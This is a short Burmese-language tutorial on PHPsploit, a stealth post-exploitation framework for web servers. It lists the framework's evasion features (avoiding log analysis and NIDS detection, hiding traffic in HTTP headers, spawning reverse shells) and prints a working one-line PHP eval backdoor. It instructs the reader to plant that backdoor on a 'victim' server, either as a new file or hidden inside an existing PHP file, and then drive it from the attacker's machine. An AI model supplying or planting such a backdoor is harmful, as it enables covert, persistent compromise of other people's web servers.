Post Exploitation : Phpsploit Tutorial

Post Exploitation ဆိုတာ Exploitation လုပ္ျပီးတဲ့အခ်ိန္မွာ Maintaining Access , Privellege Escalation စတာေတြလုပ္တဲ့ အဆင့္ပဲျဖစ္ပါတယ္။ Web Hacking နဲ႕ပတ္သတ္ျပီးေတာ့ အမ်ားစုက Post Exploitation အတြက္ Web Shell ေတြကို အသံုးမ်ားပါတယ္။ Web Shell ထဲကမွတစ္ဆင့္ Back Connect နဲ႕ က်ေနာ္တို႕ စက္ or VPS ကိုျပန္ျပီး Reverse Shell ကိုသံုးတာေတြ႕ရတယ္။ ဒီကမွတစ္ဆင့္ Privellege Escalation လုပ္ၾကပါတယ္။ ဒီအခါမွာ Web Shell ေတြမသံုးပဲ PHP Sploit ဆိုတဲ့ Post Exploitation Framework ေလးကိုသံုးခ်င္ရင္သံုးလို႕ရေအာင္ Tutorial အေနနဲ႕ေရးေပးတာပါ။

Download PHPsploit 

https://github.com/nil0x42/phpsploit

Features

Efficient: More than 20 plugins to automate post-exploitation tasks

Run commands and browse filesystem, bypassing PHP security restrictions
Upload/Download files between client and target
Edit remote files through local text editor
Run SQL console on target system
Spawn reverse TCP shells
Stealth: The framework is made by paranoids, for paranoids

Nearly invisible by log analysis and NIDS signature detection
Safe-mode and common PHP security restrictions bypass
Communications are hidden in HTTP Headers
Loaded payloads are obfuscated to bypass NIDS
http/https/socks4/socks5 Proxy support
Convenient: A robust interface with many crucial features

Cross-platform on both the client and the server.
Powerful interface with completion and multi-command support
Session saving/loading feature, with persistent history
Multi-request support for large payloads (such as uploads)
Provides a powerful, highly configurable settings engine
Each setting, such as user-agent has a polymorphic mode
Customisable environment variables for plugin interaction
Provides a complete plugin development API

Tiny Polymaphic Backdoor

Victim ဘက္မွာထည့္ရမယ့္ Backdoor ေလးကလဲ ေသးေသးေလးျဖစ္တာေၾကာင့္ phpsploit ကို Stealth Post Exploitation Framework လို႕ေျပာတာျဖစ္ပါတယ္။ ေနာက္တစ္ခုက Backdoor ခ်န္ခဲ့တဲ့အခါမွာ RCE code တစ္ခုခုခ်န္ခဲ့တာထက္စာရင္ back connect ပါရျပီးသားမလို႕ ပိုျပီးသံုးလို႕ေကာင္းတာေပါ့

Backdoor Code 

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

ဒါေလးကို Victim ဘက္မွာ script.php လို႕ save ထားျပီး စမ္းၾကည့္ႏိုင္ပါတယ္။ ဒါမွမဟုတ္လဲ ရွိျပီးသား php file ထဲ ထည့္ထားရင္ Backdoor လိုမ်ိဳး အသံုးျပဳႏိုင္တာေပါ့

Attacker Site

./phpsploit

Shell Session

Running Commands

run <command>

Enjoy !